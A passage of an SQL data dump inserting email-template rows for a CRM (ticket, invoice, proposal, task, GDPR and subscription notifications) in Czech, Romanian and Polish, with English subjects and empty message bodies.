(1171, 'subscriptions', 'subscription-payment-succeeded', 'czech', 'Subscription Payment Succeeded (Sent to customer primary contact) [czech]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1172, 'contract', 'contract-expiration-to-staff', 'czech', 'Contract Expiration Reminder (Sent to Staff) [czech]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1173, 'gdpr', 'gdpr-removal-request', 'czech', 'Removal Request From Contact (Sent to administrators) [czech]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1174, 'gdpr', 'gdpr-removal-request-lead', 'czech', 'Removal Request From Lead (Sent to administrators) [czech]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1175, 'client', 'client-registration-confirmed', 'czech', 'Customer Registration Confirmed [czech]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1176, 'contract', 'contract-signed-to-staff', 'czech', 'Contract Signed (Sent to Staff) [czech]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1177, 'subscriptions', 'customer-subscribed-to-staff', 'czech', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [czech]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1178, 'client', 'contact-verification-email', 'czech', 'Email Verification (Sent to Contact After Registration) [czech]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1179, 'client', 'new-customer-profile-file-uploaded-to-staff', 'czech', 'New Customer Profile File(s) Uploaded (Sent to Staff) [czech]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1180, 'staff', 'event-notification-to-staff', 'czech', 'Event Notification (Calendar) [czech]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(1181, 'subscriptions', 'subscription-payment-requires-action', 'czech', 'Credit Card Authorization Required - SCA [czech]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1182, 'invoice', 'invoice-due-notice', 'czech', 'Invoice Due Notice [czech]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1183, 'estimate_request', 'estimate-request-submitted-to-staff', 'czech', 'Estimate Request Submitted (Sent to Staff) [czech]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(1184, 'estimate_request', 'estimate-request-assigned', 'czech', 'Estimate Request Assigned (Sent to Staff) [czech]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1185, 'estimate_request', 'estimate-request-received-to-user', 'czech', 'Estimate Request Received (Sent to User) [czech]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1186, 'client', 'new-client-created', 'romanian', 'New Contact Added/Registered (Welcome Email) [romanian]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1187, 'invoice', 'invoice-send-to-client', 'romanian', 'Send Invoice to Customer [romanian]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(1188, 'ticket', 'new-ticket-opened-admin', 'romanian', 'New Ticket Opened (Opened by Staff, Sent to Customer) [romanian]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1189, 'ticket', 'ticket-reply', 'romanian', 'Ticket Reply (Sent to Customer) [romanian]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1190, 'ticket', 'ticket-autoresponse', 'romanian', 'New Ticket Opened - Autoresponse [romanian]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1191, 'invoice', 'invoice-payment-recorded', 'romanian', 'Invoice Payment Recorded (Sent to Customer) [romanian]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(1192, 'invoice', 'invoice-overdue-notice', 'romanian', 'Invoice Overdue Notice [romanian]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1193, 'invoice', 'invoice-already-send', 'romanian', 'Invoice Already Sent to Customer [romanian]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1194, 'ticket', 'new-ticket-created-staff', 'romanian', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [romanian]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(1195, 'estimate', 'estimate-send-to-client', 'romanian', 'Send Estimate to Customer [romanian]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(1196, 'ticket', 'ticket-reply-to-admin', 'romanian', 'Ticket Reply (Sent to Staff) [romanian]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1197, 'estimate', 'estimate-already-send', 'romanian', 'Estimate Already Sent to Customer [romanian]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(1198, 'contract', 'contract-expiration', 'romanian', 'Contract Expiration Reminder (Sent to Customer Contacts) [romanian]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1199, 'tasks', 'task-assigned', 'romanian', 'New Task Assigned (Sent to Staff) [romanian]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1200, 'tasks', 'task-added-as-follower', 'romanian', 'Staff Member Added as Follower on Task (Sent to Staff) [romanian]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1201, 'tasks', 'task-commented', 'romanian', 'New Comment on Task (Sent to Staff) [romanian]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1202, 'tasks', 'task-added-attachment', 'romanian', 'New Attachment(s) on Task (Sent to Staff) [romanian]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1203, 'estimate', 'estimate-declined-to-staff', 'romanian', 'Estimate Declined (Sent to Staff) [romanian]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1204, 'estimate', 'estimate-accepted-to-staff', 'romanian', 'Estimate Accepted (Sent to Staff) [romanian]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1205, 'proposals', 'proposal-client-accepted', 'romanian', 'Customer Action - Accepted (Sent to Staff) [romanian]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1206, 'proposals', 'proposal-send-to-customer', 'romanian', 'Send Proposal to Customer [romanian]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1207, 'proposals', 'proposal-client-declined', 'romanian', 'Customer Action - Declined (Sent to Staff) [romanian]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1208, 'proposals', 'proposal-client-thank-you', 'romanian', 'Thank You Email (Sent to Customer After Accept) [romanian]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1209, 'proposals', 'proposal-comment-to-client', 'romanian', 'New Comment  (Sent to Customer/Lead) [romanian]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1210, 'proposals', 'proposal-comment-to-admin', 'romanian', 'New Comment (Sent to Staff)  [romanian]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1211, 'estimate', 'estimate-thank-you-to-customer', 'romanian', 'Thank You Email (Sent to Customer After Accept) [romanian]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(1212, 'tasks', 'task-deadline-notification', 'romanian', 'Task Deadline Reminder - Sent to Assigned Members [romanian]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1213, 'contract', 'send-contract', 'romanian', 'Send Contract to Customer [romanian]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1214, 'invoice', 'invoice-payment-recorded-to-staff', 'romanian', 'Invoice Payment Recorded (Sent to Staff) [romanian]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(1215, 'ticket', 'auto-close-ticket', 'romanian', 'Auto Close Ticket [romanian]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1216, 'project', 'new-project-discussion-created-to-staff', 'romanian', 'New Project Discussion (Sent to Project Members) [romanian]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1217, 'project', 'new-project-discussion-created-to-customer', 'romanian', 'New Project Discussion (Sent to Customer Contacts) [romanian]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1218, 'project', 'new-project-file-uploaded-to-customer', 'romanian', 'New Project File(s) Uploaded (Sent to Customer Contacts) [romanian]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1219, 'project', 'new-project-file-uploaded-to-staff', 'romanian', 'New Project File(s) Uploaded (Sent to Project Members) [romanian]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1220, 'project', 'new-project-discussion-comment-to-customer', 'romanian', 'New Discussion Comment  (Sent to Customer Contacts) [romanian]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1221, 'project', 'new-project-discussion-comment-to-staff', 'romanian', 'New Discussion Comment (Sent to Project Members) [romanian]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1222, 'project', 'staff-added-as-project-member', 'romanian', 'Staff Added as Project Member [romanian]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1223, 'estimate', 'estimate-expiry-reminder', 'romanian', 'Estimate Expiration Reminder [romanian]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1224, 'proposals', 'proposal-expiry-reminder', 'romanian', 'Proposal Expiration Reminder [romanian]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1225, 'staff', 'new-staff-created', 'romanian', 'New Staff Created (Welcome Email) [romanian]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(1226, 'client', 'contact-forgot-password', 'romanian', 'Forgot Password [romanian]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1227, 'client', 'contact-password-reseted', 'romanian', 'Password Reset - Confirmation [romanian]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1228, 'client', 'contact-set-password', 'romanian', 'Set New Password [romanian]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1229, 'staff', 'staff-forgot-password', 'romanian', 'Forgot Password [romanian]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1230, 'staff', 'staff-password-reseted', 'romanian', 'Password Reset - Confirmation [romanian]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1231, 'project', 'assigned-to-project', 'romanian', 'New Project Created (Sent to Customer Contacts) [romanian]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1232, 'tasks', 'task-added-attachment-to-contacts', 'romanian', 'New Attachment(s) on Task (Sent to Customer Contacts) [romanian]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1233, 'tasks', 'task-commented-to-contacts', 'romanian', 'New Comment on Task (Sent to Customer Contacts) [romanian]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1234, 'leads', 'new-lead-assigned', 'romanian', 'New Lead Assigned to Staff Member [romanian]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(1235, 'client', 'client-statement', 'romanian', 'Statement - Account Summary [romanian]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(1236, 'ticket', 'ticket-assigned-to-admin', 'romanian', 'New Ticket Assigned (Sent to Staff) [romanian]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(1237, 'client', 'new-client-registered-to-admin', 'romanian', 'New Customer Registration (Sent to admins) [romanian]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1238, 'leads', 'new-web-to-lead-form-submitted', 'romanian', 'Web to lead form submitted - Sent to lead [romanian]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1239, 'staff', 'two-factor-authentication', 'romanian', 'Two Factor Authentication [romanian]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1240, 'project', 'project-finished-to-customer', 'romanian', 'Project Marked as Finished (Sent to Customer Contacts) [romanian]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1241, 'credit_note', 'credit-note-send-to-client', 'romanian', 'Send Credit Note To Email [romanian]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1242, 'tasks', 'task-status-change-to-staff', 'romanian', 'Task Status Changed (Sent to Staff) [romanian]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(1243, 'tasks', 'task-status-change-to-contacts', 'romanian', 'Task Status Changed (Sent to Customer Contacts) [romanian]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1244, 'staff', 'reminder-email-staff', 'romanian', 'Staff Reminder Email [romanian]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1245, 'contract', 'contract-comment-to-client', 'romanian', 'New Comment  (Sent to Customer Contacts) [romanian]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1246, 'contract', 'contract-comment-to-admin', 'romanian', 'New Comment (Sent to Staff)  [romanian]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1247, 'subscriptions', 'send-subscription', 'romanian', 'Send Subscription to Customer [romanian]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(1248, 'subscriptions', 'subscription-payment-failed', 'romanian', 'Subscription Payment Failed [romanian]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1249, 'subscriptions', 'subscription-canceled', 'romanian', 'Subscription Canceled (Sent to customer primary contact) [romanian]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1250, 'subscriptions', 'subscription-payment-succeeded', 'romanian', 'Subscription Payment Succeeded (Sent to customer primary contact) [romanian]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1251, 'contract', 'contract-expiration-to-staff', 'romanian', 'Contract Expiration Reminder (Sent to Staff) [romanian]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1252, 'gdpr', 'gdpr-removal-request', 'romanian', 'Removal Request From Contact (Sent to administrators) [romanian]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1253, 'gdpr', 'gdpr-removal-request-lead', 'romanian', 'Removal Request From Lead (Sent to administrators) [romanian]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1254, 'client', 'client-registration-confirmed', 'romanian', 'Customer Registration Confirmed [romanian]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1255, 'contract', 'contract-signed-to-staff', 'romanian', 'Contract Signed (Sent to Staff) [romanian]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1256, 'subscriptions', 'customer-subscribed-to-staff', 'romanian', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [romanian]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1257, 'client', 'contact-verification-email', 'romanian', 'Email Verification (Sent to Contact After Registration) [romanian]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1258, 'client', 'new-customer-profile-file-uploaded-to-staff', 'romanian', 'New Customer Profile File(s) Uploaded (Sent to Staff) [romanian]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1259, 'staff', 'event-notification-to-staff', 'romanian', 'Event Notification (Calendar) [romanian]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(1260, 'subscriptions', 'subscription-payment-requires-action', 'romanian', 'Credit Card Authorization Required - SCA [romanian]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1261, 'invoice', 'invoice-due-notice', 'romanian', 'Invoice Due Notice [romanian]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1262, 'estimate_request', 'estimate-request-submitted-to-staff', 'romanian', 'Estimate Request Submitted (Sent to Staff) [romanian]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(1263, 'estimate_request', 'estimate-request-assigned', 'romanian', 'Estimate Request Assigned (Sent to Staff) [romanian]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1264, 'estimate_request', 'estimate-request-received-to-user', 'romanian', 'Estimate Request Received (Sent to User) [romanian]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1265, 'client', 'new-client-created', 'polish', 'New Contact Added/Registered (Welcome Email) [polish]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1266, 'invoice', 'invoice-send-to-client', 'polish', 'Send Invoice to Customer [polish]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(1267, 'ticket', 'new-ticket-opened-admin', 'polish', 'New Ticket Opened (Opened by Staff, Sent to Customer) [polish]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1268, 'ticket', 'ticket-reply', 'polish', 'Ticket Reply (Sent to Customer) [polish]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1269, 'ticket', 'ticket-autoresponse', 'polish', 'New Ticket Opened - Autoresponse [polish]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1270, 'invoice', 'invoice-payment-recorded', 'polish', 'Invoice Payment Recorded (Sent to Customer) [polish]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(1271, 'invoice', 'invoice-overdue-notice', 'polish', 'Invoice Overdue Notice [polish]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1272, 'invoice', 'invoice-already-send', 'polish', 'Invoice Already Sent to Customer [polish]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1273, 'ticket', 'new-ticket-created-staff', 'polish', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [polish]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(1274, 'estimate', 'estimate-send-to-client', 'polish', 'Send Estimate to Customer [polish]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(1275, 'ticket', 'ticket-reply-to-admin', 'polish', 'Ticket Reply (Sent to Staff) [polish]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1276, 'estimate', 'estimate-already-send', 'polish', 'Estimate Already Sent to Customer [polish]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(1277, 'contract', 'contract-expiration', 'polish', 'Contract Expiration Reminder (Sent to Customer Contacts) [polish]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1278, 'tasks', 'task-assigned', 'polish', 'New Task Assigned (Sent to Staff) [polish]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1279, 'tasks', 'task-added-as-follower', 'polish', 'Staff Member Added as Follower on Task (Sent to Staff) [polish]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1280, 'tasks', 'task-commented', 'polish', 'New Comment on Task (Sent to Staff) [polish]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1281, 'tasks', 'task-added-attachment', 'polish', 'New Attachment(s) on Task (Sent to Staff) [polish]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1282, 'estimate', 'estimate-declined-to-staff', 'polish', 'Estimate Declined (Sent to Staff) [polish]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1283, 'estimate', 'estimate-accepted-to-staff', 'polish', 'Estimate Accepted (Sent to Staff) [polish]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1284, 'proposals', 'proposal-client-accepted', 'polish', 'Customer Action - Accepted (Sent to Staff) [polish]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1285, 'proposals', 'proposal-send-to-customer', 'polish', 'Send Proposal to Customer [polish]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1286, 'proposals', 'proposal-client-declined', 'polish', 'Customer Action - Declined (Sent to Staff) [polish]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1287, 'proposals', 'proposal-client-thank-you', 'polish', 'Thank You Email (Sent to Customer After Accept) [polish]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1288, 'proposals', 'proposal-comment-to-client', 'polish', 'New Comment  (Sent to Customer/Lead) [polish]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1289, 'proposals', 'proposal-comment-to-admin', 'polish', 'New Comment (Sent to Staff)  [polish]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1290, 'estimate', 'estimate-thank-you-to-customer', 'polish', 'Thank You Email (Sent to Customer After Accept) [polish]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(1291, 'tasks', 'task-deadline-notification', 'polish', 'Task Deadline Reminder - Sent to Assigned Members [polish]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1292, 'contract', 'send-contract', 'polish', 'Send Contract to Customer [polish]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1293, 'invoice', 'invoice-payment-recorded-to-staff', 'polish', 'Invoice Payment Recorded (Sent to Staff) [polish]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(1294, 'ticket', 'auto-close-ticket', 'polish', 'Auto Close Ticket [polish]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1295, 'project', 'new-project-discussion-created-to-staff', 'polish', 'New Project Discussion (Sent to Project Members) [polish]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1296, 'project', 'new-project-discussion-created-to-customer', 'polish', 'New Project Discussion (Sent to Customer Contacts) [polish]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1297, 'project', 'new-project-file-uploaded-to-customer', 'polish', 'New Project File(s) Uploaded (Sent to Customer Contacts) [polish]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1298, 'project', 'new-project-file-uploaded-to-staff', 'polish', 'New Project File(s) Uploaded (Sent to Project Members) [polish]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1299, 'project', 'new-project-discussion-comment-to-customer', 'polish', 'New Discussion Comment  (Sent to Customer Contacts) [polish]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1300, 'project', 'new-project-discussion-comment-to-staff', 'polish', 'New Discussion Comment (Sent to Project Members) [polish]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1301, 'project', 'staff-added-as-project-member', 'polish', 'Staff Added as Project Member [polish]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1302, 'estimate', 'estimate-expiry-reminder', 'polish', 'Estimate Expiration Reminder [polish]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1303, 'proposals', 'proposal-expiry-reminder', 'polish', 'Proposal Expiration Reminder [polish]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1304, 'staff', 'new-staff-created', 'polish', 'New Staff Created (Welcome Email) [polish]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(1305, 'client', 'contact-forgot-password', 'polish', 'Forgot Password [polish]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1306, 'client', 'contact-password-reseted', 'polish', 'Password Reset - Confirmation [polish]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1307, 'client', 'contact-set-password', 'polish', 'Set New Password [polish]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1308, 'staff', 'staff-forgot-password', 'polish', 'Forgot Password [polish]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1309, 'staff', 'staff-password-reseted', 'polish', 'Password Reset - Confirmation [polish]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1310, 'project', 'assigned-to-project', 'polish', 'New Project Created (Sent to Customer Contacts) [polish]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1311, 'tasks', 'task-added-attachment-to-contacts', 'polish', 'New Attachment(s) on Task (Sent to Customer Contacts) [polish]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1312, 'tasks', 'task-commented-to-contacts', 'polish', 'New Comment on Task (Sent to Customer Contacts) [polish]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1313, 'leads', 'new-lead-assigned', 'polish', 'New Lead Assigned to Staff Member [polish]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(1314, 'client', 'client-statement', 'polish', 'Statement - Account Summary [polish]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(1315, 'ticket', 'ticket-assigned-to-admin', 'polish', 'New Ticket Assigned (Sent to Staff) [polish]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(1316, 'client', 'new-client-registered-to-admin', 'polish', 'New Customer Registration (Sent to admins) [polish]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1317, 'leads', 'new-web-to-lead-form-submitted', 'polish', 'Web to lead form submitted - Sent to lead [polish]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1318, 'staff', 'two-factor-authentication', 'polish', 'Two Factor Authentication [polish]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1319, 'project', 'project-finished-to-customer', 'polish', 'Project Marked as Finished (Sent to Customer Contacts) [polish]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1320, 'credit_note', 'credit-note-send-to-client', 'polish', 'Send Credit Note To Email [polish]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1321, 'tasks', 'task-status-change-to-staff', 'polish', 'Task Status Changed (Sent to Staff) [polish]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(1322, 'tasks', 'task-status-change-to-contacts', 'polish', 'Task Status Changed (Sent to Customer Contacts) [polish]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1323, 'staff', 'reminder-email-staff', 'polish', 'Staff Reminder Email [polish]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1324, 'contract', 'contract-comment-to-client', 'polish', 'New Comment  (Sent to Customer Contacts) [polish]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1325, 'contract', 'contract-comment-to-admin', 'polish', 'New Comment (Sent to Staff)  [polish]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1326, 'subscriptions', 'send-subscription', 'polish', 'Send Subscription to Customer [polish]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(1327, 'subscriptions', 'subscription-payment-failed', 'polish', 'Subscription Payment Failed [polish]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1328, 'subscriptions', 'subscription-canceled', 'polish', 'Subscription Canceled (Sent to customer primary contact) [polish]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1329, 'subscriptions', 'subscription-payment-succeeded', 'polish', 'Subscription Payment Succeeded (Sent to customer primary contact) [polish]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1330, 'contract', 'contract-expiration-to-staff', 'polish', 'Contract Expiration Reminder (Sent to Staff) [polish]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1331, 'gdpr', 'gdpr-removal-request', 'polish', 'Removal Request From Contact (Sent to administrators) [polish]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1332, 'gdpr', 'gdpr-removal-request-lead', 'polish', 'Removal Request From Lead (Sent to administrators) [polish]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
